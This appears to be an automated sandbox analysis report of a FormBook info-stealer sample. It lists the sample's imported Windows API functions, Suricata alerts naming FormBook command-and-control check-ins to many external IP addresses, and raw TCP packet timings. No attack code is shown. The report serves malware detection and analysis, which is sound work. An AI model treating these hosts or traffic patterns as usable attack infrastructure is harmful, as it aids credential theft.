GDI32.dll	EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll	DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-11T08:31:13.022041+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	172.202.163.200	443	192.168.2.4	49730	TCP
2024-11-11T08:31:21.491778+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49736	156.234.28.94	80	TCP
2024-11-11T08:31:37.323191+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49737	38.88.82.56	80	TCP
2024-11-11T08:31:39.884168+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49738	38.88.82.56	80	TCP
2024-11-11T08:31:42.477677+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49739	38.88.82.56	80	TCP
2024-11-11T08:31:45.158192+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49740	38.88.82.56	80	TCP
2024-11-11T08:31:50.716807+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49741	3.33.130.190	80	TCP
2024-11-11T08:31:51.251283+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	172.202.163.200	443	192.168.2.4	49742	TCP
2024-11-11T08:31:53.258317+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49743	3.33.130.190	80	TCP
2024-11-11T08:31:55.807075+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49750	3.33.130.190	80	TCP
2024-11-11T08:31:58.357109+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49771	3.33.130.190	80	TCP
2024-11-11T08:32:04.468216+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49817	194.58.112.174	80	TCP
2024-11-11T08:32:07.050386+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49841	194.58.112.174	80	TCP
2024-11-11T08:32:09.590447+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49860	194.58.112.174	80	TCP
2024-11-11T08:32:12.134100+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49881	194.58.112.174	80	TCP
2024-11-11T08:32:17.737155+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49926	3.33.130.190	80	TCP
2024-11-11T08:32:20.277001+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49944	3.33.130.190	80	TCP
2024-11-11T08:32:22.945171+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49965	3.33.130.190	80	TCP
2024-11-11T08:32:25.499026+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49986	3.33.130.190	80	TCP
2024-11-11T08:32:32.108767+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50019	104.21.14.183	80	TCP
2024-11-11T08:32:34.662021+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50020	104.21.14.183	80	TCP
2024-11-11T08:32:37.275494+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50021	104.21.14.183	80	TCP
2024-11-11T08:32:39.842290+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50022	104.21.14.183	80	TCP
2024-11-11T08:32:46.152936+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50023	67.223.117.142	80	TCP
2024-11-11T08:32:48.708858+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50024	67.223.117.142	80	TCP
2024-11-11T08:32:51.225117+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50025	67.223.117.142	80	TCP
2024-11-11T08:32:53.757114+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50026	67.223.117.142	80	TCP
2024-11-11T08:32:59.243532+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50027	3.33.130.190	80	TCP
2024-11-11T08:33:01.805183+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50028	3.33.130.190	80	TCP
2024-11-11T08:33:04.336605+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50029	3.33.130.190	80	TCP
2024-11-11T08:33:07.069675+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50030	3.33.130.190	80	TCP
2024-11-11T08:33:13.085137+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50031	113.20.119.31	80	TCP
2024-11-11T08:33:15.617147+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50032	113.20.119.31	80	TCP
2024-11-11T08:33:18.177605+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50033	113.20.119.31	80	TCP
2024-11-11T08:33:20.802632+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50034	113.20.119.31	80	TCP
2024-11-11T08:33:27.396358+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50035	47.129.103.185	80	TCP
2024-11-11T08:33:29.880771+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50036	47.129.103.185	80	TCP
2024-11-11T08:33:32.583880+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50037	47.129.103.185	80	TCP
2024-11-11T08:33:34.992839+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50038	47.129.103.185	80	TCP
2024-11-11T08:33:40.749768+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50039	38.47.237.27	80	TCP
2024-11-11T08:33:43.291959+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50040	38.47.237.27	80	TCP
2024-11-11T08:33:45.837304+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50041	38.47.237.27	80	TCP
2024-11-11T08:33:48.382167+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50042	38.47.237.27	80	TCP
2024-11-11T08:33:55.053184+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50043	206.119.81.36	80	TCP
2024-11-11T08:33:57.771422+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50044	206.119.81.36	80	TCP
2024-11-11T08:34:00.209200+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50045	206.119.81.36	80	TCP
2024-11-11T08:34:02.833928+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50046	206.119.81.36	80	TCP
2024-11-11T08:34:08.671334+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50047	142.250.184.211	80	TCP
2024-11-11T08:34:11.163664+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50048	142.250.184.211	80	TCP
2024-11-11T08:34:13.715732+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50049	142.250.184.211	80	TCP
2024-11-11T08:34:16.272379+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50050	142.250.184.211	80	TCP
2024-11-11T08:34:22.068858+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50051	3.33.130.190	80	TCP
2024-11-11T08:34:24.617760+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50052	3.33.130.190	80	TCP
2024-11-11T08:34:27.153277+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50053	3.33.130.190	80	TCP
2024-11-11T08:34:29.709427+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50054	3.33.130.190	80	TCP
2024-11-11T08:34:36.084085+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50055	154.23.184.95	80	TCP
2024-11-11T08:34:38.787149+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50056	154.23.184.95	80	TCP
2024-11-11T08:34:41.209018+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50057	154.23.184.95	80	TCP
2024-11-11T08:34:43.740298+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50058	154.23.184.95	80	TCP
2024-11-11T08:34:49.589931+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50059	185.27.134.144	80	TCP
2024-11-11T08:34:52.115377+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50060	185.27.134.144	80	TCP
2024-11-11T08:34:54.693499+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50061	185.27.134.144	80	TCP
2024-11-11T08:34:57.229452+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50062	185.27.134.144	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 11, 2024 08:31:20.689724922 CET	49736	80	192.168.2.4	156.234.28.94
Nov 11, 2024 08:31:20.694657087 CET	80	49736	156.234.28.94	192.168.2.4
Nov 11, 2024 08:31:20.694772005 CET	49736	80	192.168.2.4	156.234.28.94
Nov 11, 2024 08:31:20.702200890 CET	49736	80	192.168.2.4	156.234.28.94
Nov 11, 2024 08:31:20.707019091 CET	80	49736	156.234.28.94	192.168.2.4
Nov 11, 2024 08:31:21.491584063 CET	80	49736	156.234.28.94	192.168.2.4
Nov 11, 2024 08:31:21.491633892 CET	80	49736	156.234.28.94	192.168.2.4
Nov 11, 2024 08:31:21.491777897 CET	49736	80	192.168.2.4	156.234.28.94
Nov 11, 2024 08:31:21.491800070 CET	80	49736	156.234.28.94	192.168.2.4
Nov 11, 2024 08:31:21.536794901 CET	49736	80	192.168.2.4	156.234.28.94
Nov 11, 2024 08:31:21.683073997 CET	80	49736	156.234.28.94	192.168.2.4
Nov 11, 2024 08:31:21.683361053 CET	49736	80	192.168.2.4	156.234.28.94
Nov 11, 2024 08:31:21.684644938 CET	49736	80	192.168.2.4	156.234.28.94
Nov 11, 2024 08:31:21.690499067 CET	80	49736	156.234.28.94	192.168.2.4
Nov 11, 2024 08:31:36.741745949 CET	49737	80	192.168.2.4	38.88.82.56
Nov 11, 2024 08:31:36.746597052 CET	80	49737	38.88.82.56	192.168.2.4
Nov 11, 2024 08:31:36.746690035 CET	49737	80	192.168.2.4	38.88.82.56
Nov 11, 2024 08:31:36.761873007 CET	49737	80	192.168.2.4	38.88.82.56
Nov 11, 2024 08:31:36.766765118 CET	80	49737	38.88.82.56	192.168.2.4
Nov 11, 2024 08:31:37.323112011 CET	80	49737	38.88.82.56	192.168.2.4
Nov 11, 2024 08:31:37.323129892 CET	80	49737	38.88.82.56	192.168.2.4
Nov 11, 2024 08:31:37.323190928 CET	49737	80	192.168.2.4	38.88.82.56
Nov 11, 2024 08:31:37.371419907 CET	80	49737	38.88.82.56	192.168.2.4
Nov 11, 2024 08:31:37.371498108 CET	49737	80	192.168.2.4	38.88.82.56
Nov 11, 2024 08:31:38.271477938 CET	49737	80	192.168.2.4	38.88.82.56
Nov 11, 2024 08:31:39.327296019 CET	49738	80	192.168.2.4	38.88.82.56
Nov 11, 2024 08:31:39.332247019 CET	80	49738	38.88.82.56	192.168.2.4
Nov 11, 2024 08:31:39.332348108 CET	49738	80	192.168.2.4	38.88.82.56
Nov 11, 2024 08:31:39.383377075 CET	49738	80	192.168.2.4	38.88.82.56
Nov 11, 2024 08:31:39.388197899 CET	80	49738	38.88.82.56	192.168.2.4
Nov 11, 2024 08:31:39.883871078 CET	80	49738	38.88.82.56	192.168.2.4
Nov 11, 2024 08:31:39.884116888 CET	80	49738	38.88.82.56	192.168.2.4
Nov 11, 2024 08:31:39.884167910 CET	49738	80	192.168.2.4	38.88.82.56
Nov 11, 2024 08:31:39.948534012 CET	80	49738	38.88.82.56	192.168.2.4
Nov 11, 2024 08:31:39.948594093 CET	49738	80	192.168.2.4	38.88.82.56
Nov 11, 2024 08:31:40.896372080 CET	49738	80	192.168.2.4	38.88.82.56
Nov 11, 2024 08:31:41.915301085 CET	49739	80	192.168.2.4	38.88.82.56
Nov 11, 2024 08:31:41.920218945 CET	80	49739	38.88.82.56	192.168.2.4
Nov 11, 2024 08:31:41.920301914 CET	49739	80	192.168.2.4	38.88.82.56
Nov 11, 2024 08:31:41.931054115 CET	49739	80	192.168.2.4	38.88.82.56
Nov 11, 2024 08:31:41.936022997 CET	80	49739	38.88.82.56	192.168.2.4
Nov 11, 2024 08:31:41.936033964 CET	80	49739	38.88.82.56	192.168.2.4
Nov 11, 2024 08:31:41.936052084 CET	80	49739	38.88.82.56	192.168.2.4
Nov 11, 2024 08:31:41.936060905 CET	80	49739	38.88.82.56	192.168.2.4
Nov 11, 2024 08:31:41.936100006 CET	80	49739	38.88.82.56	192.168.2.4
Nov 11, 2024 08:31:41.936109066 CET	80	49739	38.88.82.56	192.168.2.4
Nov 11, 2024 08:31:41.936153889 CET	80	49739	38.88.82.56	192.168.2.4
Nov 11, 2024 08:31:41.936162949 CET	80	49739	38.88.82.56	192.168.2.4
Nov 11, 2024 08:31:41.936173916 CET	80	49739	38.88.82.56	192.168.2.4
Nov 11, 2024 08:31:42.477579117 CET	80	49739	38.88.82.56	192.168.2.4
Nov 11, 2024 08:31:42.477593899 CET	80	49739	38.88.82.56	192.168.2.4
Nov 11, 2024 08:31:42.477677107 CET	49739	80	192.168.2.4	38.88.82.56
Nov 11, 2024 08:31:42.542265892 CET	80	49739	38.88.82.56	192.168.2.4
Nov 11, 2024 08:31:42.542349100 CET	49739	80	192.168.2.4	38.88.82.56
Nov 11, 2024 08:31:43.443145990 CET	49739	80	192.168.2.4	38.88.82.56
Nov 11, 2024 08:31:44.462219000 CET	49740	80	192.168.2.4	38.88.82.56
Nov 11, 2024 08:31:44.603002071 CET	80	49740	38.88.82.56	192.168.2.4
Nov 11, 2024 08:31:44.603108883 CET	49740	80	192.168.2.4	38.88.82.56
Nov 11, 2024 08:31:44.616900921 CET	49740	80	192.168.2.4	38.88.82.56
Nov 11, 2024 08:31:44.621809006 CET	80	49740	38.88.82.56	192.168.2.4
Nov 11, 2024 08:31:45.157999039 CET	80	49740	38.88.82.56	192.168.2.4
Nov 11, 2024 08:31:45.158015013 CET	80	49740	38.88.82.56	192.168.2.4
Nov 11, 2024 08:31:45.158191919 CET	49740	80	192.168.2.4	38.88.82.56
Nov 11, 2024 08:31:45.222867966 CET	80	49740	38.88.82.56	192.168.2.4
Nov 11, 2024 08:31:45.223073006 CET	49740	80	192.168.2.4	38.88.82.56
Nov 11, 2024 08:31:45.229556084 CET	49740	80	192.168.2.4	38.88.82.56
Nov 11, 2024 08:31:45.234355927 CET	80	49740	38.88.82.56	192.168.2.4
Nov 11, 2024 08:31:50.275883913 CET	49741	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:31:50.280777931 CET	80	49741	3.33.130.190	192.168.2.4
Nov 11, 2024 08:31:50.280895948 CET	49741	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:31:50.292423010 CET	49741	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:31:50.297384977 CET	80	49741	3.33.130.190	192.168.2.4
Nov 11, 2024 08:31:50.716703892 CET	80	49741	3.33.130.190	192.168.2.4
Nov 11, 2024 08:31:50.716806889 CET	49741	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:31:51.802694082 CET	49741	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:31:51.807707071 CET	80	49741	3.33.130.190	192.168.2.4
Nov 11, 2024 08:31:52.821063042 CET	49743	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:31:52.826004982 CET	80	49743	3.33.130.190	192.168.2.4
Nov 11, 2024 08:31:52.826090097 CET	49743	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:31:52.836875916 CET	49743	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:31:52.841706991 CET	80	49743	3.33.130.190	192.168.2.4
Nov 11, 2024 08:31:53.258248091 CET	80	49743	3.33.130.190	192.168.2.4
Nov 11, 2024 08:31:53.258316994 CET	49743	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:31:54.349402905 CET	49743	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:31:54.354284048 CET	80	49743	3.33.130.190	192.168.2.4
Nov 11, 2024 08:31:55.368189096 CET	49750	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:31:55.373248100 CET	80	49750	3.33.130.190	192.168.2.4
Nov 11, 2024 08:31:55.373322010 CET	49750	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:31:55.384597063 CET	49750	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:31:55.389630079 CET	80	49750	3.33.130.190	192.168.2.4
Nov 11, 2024 08:31:55.389647961 CET	80	49750	3.33.130.190	192.168.2.4
Nov 11, 2024 08:31:55.389657974 CET	80	49750	3.33.130.190	192.168.2.4
Nov 11, 2024 08:31:55.389667034 CET	80	49750	3.33.130.190	192.168.2.4
Nov 11, 2024 08:31:55.389697075 CET	80	49750	3.33.130.190	192.168.2.4
Nov 11, 2024 08:31:55.389705896 CET	80	49750	3.33.130.190	192.168.2.4
Nov 11, 2024 08:31:55.389779091 CET	80	49750	3.33.130.190	192.168.2.4
Nov 11, 2024 08:31:55.389791012 CET	80	49750	3.33.130.190	192.168.2.4
Nov 11, 2024 08:31:55.389799118 CET	80	49750	3.33.130.190	192.168.2.4
Nov 11, 2024 08:31:55.807008028 CET	80	49750	3.33.130.190	192.168.2.4
Nov 11, 2024 08:31:55.807075024 CET	49750	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:31:56.896434069 CET	49750	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:31:56.901248932 CET	80	49750	3.33.130.190	192.168.2.4
Nov 11, 2024 08:31:57.915154934 CET	49771	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:31:57.919980049 CET	80	49771	3.33.130.190	192.168.2.4
Nov 11, 2024 08:31:57.920088053 CET	49771	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:31:57.926712036 CET	49771	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:31:57.931638002 CET	80	49771	3.33.130.190	192.168.2.4
Nov 11, 2024 08:31:58.348066092 CET	80	49771	3.33.130.190	192.168.2.4
Nov 11, 2024 08:31:58.354474068 CET	80	49771	3.33.130.190	192.168.2.4
Nov 11, 2024 08:31:58.357109070 CET	49771	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:31:58.357901096 CET	49771	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:31:58.362687111 CET	80	49771	3.33.130.190	192.168.2.4
Nov 11, 2024 08:32:03.827442884 CET	49817	80	192.168.2.4	194.58.112.174
Nov 11, 2024 08:32:03.832442999 CET	80	49817	194.58.112.174	192.168.2.4
Nov 11, 2024 08:32:03.832526922 CET	49817	80	192.168.2.4	194.58.112.174
Nov 11, 2024 08:32:03.874814034 CET	49817	80	192.168.2.4	194.58.112.174
Nov 11, 2024 08:32:03.879652977 CET	80	49817	194.58.112.174	192.168.2.4
Nov 11, 2024 08:32:04.467914104 CET	80	49817	194.58.112.174	192.168.2.4
Nov 11, 2024 08:32:04.467931032 CET	80	49817	194.58.112.174	192.168.2.4
Nov 11, 2024 08:32:04.467947960 CET	80	49817	194.58.112.174	192.168.2.4
Nov 11, 2024 08:32:04.467958927 CET	80	49817	194.58.112.174	192.168.2.4
Nov 11, 2024 08:32:04.468215942 CET	49817	80	192.168.2.4	194.58.112.174
Nov 11, 2024 08:32:04.579428911 CET	80	49817	194.58.112.174	192.168.2.4
Nov 11, 2024 08:32:04.579555988 CET	49817	80	192.168.2.4	194.58.112.174
Nov 11, 2024 08:32:05.380680084 CET	49817	80	192.168.2.4	194.58.112.174
Nov 11, 2024 08:32:06.398888111 CET	49841	80	192.168.2.4	194.58.112.174
Nov 11, 2024 08:32:06.406538963 CET	80	49841	194.58.112.174	192.168.2.4
Nov 11, 2024 08:32:06.406728983 CET	49841	80	192.168.2.4	194.58.112.174
Nov 11, 2024 08:32:06.416846037 CET	49841	80	192.168.2.4	194.58.112.174
Nov 11, 2024 08:32:06.421684980 CET	80	49841	194.58.112.174	192.168.2.4
Nov 11, 2024 08:32:07.050313950 CET	80	49841	194.58.112.174	192.168.2.4
Nov 11, 2024 08:32:07.050333023 CET	80	49841	194.58.112.174	192.168.2.4
Nov 11, 2024 08:32:07.050344944 CET	80	49841	194.58.112.174	192.168.2.4
Nov 11, 2024 08:32:07.050357103 CET	80	49841	194.58.112.174	192.168.2.4
Nov 11, 2024 08:32:07.050385952 CET	49841	80	192.168.2.4	194.58.112.174
Nov 11, 2024 08:32:07.050422907 CET	49841	80	192.168.2.4	194.58.112.174
Nov 11, 2024 08:32:07.162687063 CET	80	49841	194.58.112.174	192.168.2.4
Nov 11, 2024 08:32:07.165225983 CET	49841	80	192.168.2.4	194.58.112.174
Nov 11, 2024 08:32:07.927566051 CET	49841	80	192.168.2.4	194.58.112.174
Nov 11, 2024 08:32:08.946573973 CET	49860	80	192.168.2.4	194.58.112.174
Nov 11, 2024 08:32:08.951410055 CET	80	49860	194.58.112.174	192.168.2.4
Nov 11, 2024 08:32:08.951487064 CET	49860	80	192.168.2.4	194.58.112.174
Nov 11, 2024 08:32:08.962441921 CET	49860	80	192.168.2.4	194.58.112.174
Nov 11, 2024 08:32:08.967273951 CET	80	49860	194.58.112.174	192.168.2.4
Nov 11, 2024 08:32:08.967356920 CET	80	49860	194.58.112.174	192.168.2.4
Nov 11, 2024 08:32:08.967366934 CET	80	49860	194.58.112.174	192.168.2.4
Nov 11, 2024 08:32:08.967382908 CET	80	49860	194.58.112.174	192.168.2.4
Nov 11, 2024 08:32:08.967391968 CET	80	49860	194.58.112.174	192.168.2.4
Nov 11, 2024 08:32:08.967410088 CET	80	49860	194.58.112.174	192.168.2.4
Nov 11, 2024 08:32:08.967418909 CET	80	49860	194.58.112.174	192.168.2.4
Nov 11, 2024 08:32:08.967468977 CET	80	49860	194.58.112.174	192.168.2.4
Nov 11, 2024 08:32:08.967477083 CET	80	49860	194.58.112.174	192.168.2.4
Nov 11, 2024 08:32:09.590374947 CET	80	49860	194.58.112.174	192.168.2.4
Nov 11, 2024 08:32:09.590389013 CET	80	49860	194.58.112.174	192.168.2.4
Nov 11, 2024 08:32:09.590400934 CET	80	49860	194.58.112.174	192.168.2.4
Nov 11, 2024 08:32:09.590446949 CET	49860	80	192.168.2.4	194.58.112.174
Nov 11, 2024 08:32:09.630646944 CET	49860	80	192.168.2.4	194.58.112.174
Nov 11, 2024 08:32:09.812721014 CET	80	49860	194.58.112.174	192.168.2.4
Nov 11, 2024 08:32:09.812910080 CET	49860	80	192.168.2.4	194.58.112.174
Nov 11, 2024 08:32:10.474482059 CET	49860	80	192.168.2.4	194.58.112.174
Nov 11, 2024 08:32:11.492806911 CET	49881	80	192.168.2.4	194.58.112.174
Nov 11, 2024 08:32:11.497632027 CET	80	49881	194.58.112.174	192.168.2.4
Nov 11, 2024 08:32:11.497695923 CET	49881	80	192.168.2.4	194.58.112.174
Nov 11, 2024 08:32:11.504558086 CET	49881	80	192.168.2.4	194.58.112.174
Nov 11, 2024 08:32:11.509401083 CET	80	49881	194.58.112.174	192.168.2.4
Nov 11, 2024 08:32:12.133975029 CET	80	49881	194.58.112.174	192.168.2.4
Nov 11, 2024 08:32:12.134052992 CET	80	49881	194.58.112.174	192.168.2.4
Nov 11, 2024 08:32:12.134078979 CET	80	49881	194.58.112.174	192.168.2.4
Nov 11, 2024 08:32:12.134094000 CET	80	49881	194.58.112.174	192.168.2.4
Nov 11, 2024 08:32:12.134099960 CET	49881	80	192.168.2.4	194.58.112.174
Nov 11, 2024 08:32:12.134129047 CET	80	49881	194.58.112.174	192.168.2.4
Nov 11, 2024 08:32:12.134140968 CET	80	49881	194.58.112.174	192.168.2.4
Nov 11, 2024 08:32:12.134186983 CET	49881	80	192.168.2.4	194.58.112.174
Nov 11, 2024 08:32:12.134212017 CET	49881	80	192.168.2.4	194.58.112.174
Nov 11, 2024 08:32:12.134390116 CET	80	49881	194.58.112.174	192.168.2.4
Nov 11, 2024 08:32:12.134418011 CET	80	49881	194.58.112.174	192.168.2.4
Nov 11, 2024 08:32:12.134429932 CET	80	49881	194.58.112.174	192.168.2.4
Nov 11, 2024 08:32:12.134452105 CET	49881	80	192.168.2.4	194.58.112.174
Nov 11, 2024 08:32:12.177505016 CET	49881	80	192.168.2.4	194.58.112.174
Nov 11, 2024 08:32:12.246148109 CET	80	49881	194.58.112.174	192.168.2.4
Nov 11, 2024 08:32:12.246280909 CET	49881	80	192.168.2.4	194.58.112.174
Nov 11, 2024 08:32:12.247173071 CET	49881	80	192.168.2.4	194.58.112.174
Nov 11, 2024 08:32:12.251935005 CET	80	49881	194.58.112.174	192.168.2.4
Nov 11, 2024 08:32:17.297074080 CET	49926	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:32:17.301963091 CET	80	49926	3.33.130.190	192.168.2.4
Nov 11, 2024 08:32:17.302098036 CET	49926	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:32:17.313082933 CET	49926	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:32:17.318109989 CET	80	49926	3.33.130.190	192.168.2.4
Nov 11, 2024 08:32:17.735625982 CET	80	49926	3.33.130.190	192.168.2.4
Nov 11, 2024 08:32:17.737154961 CET	49926	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:32:18.818197966 CET	49926	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:32:18.823332071 CET	80	49926	3.33.130.190	192.168.2.4
Nov 11, 2024 08:32:19.837080956 CET	49944	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:32:19.841995001 CET	80	49944	3.33.130.190	192.168.2.4
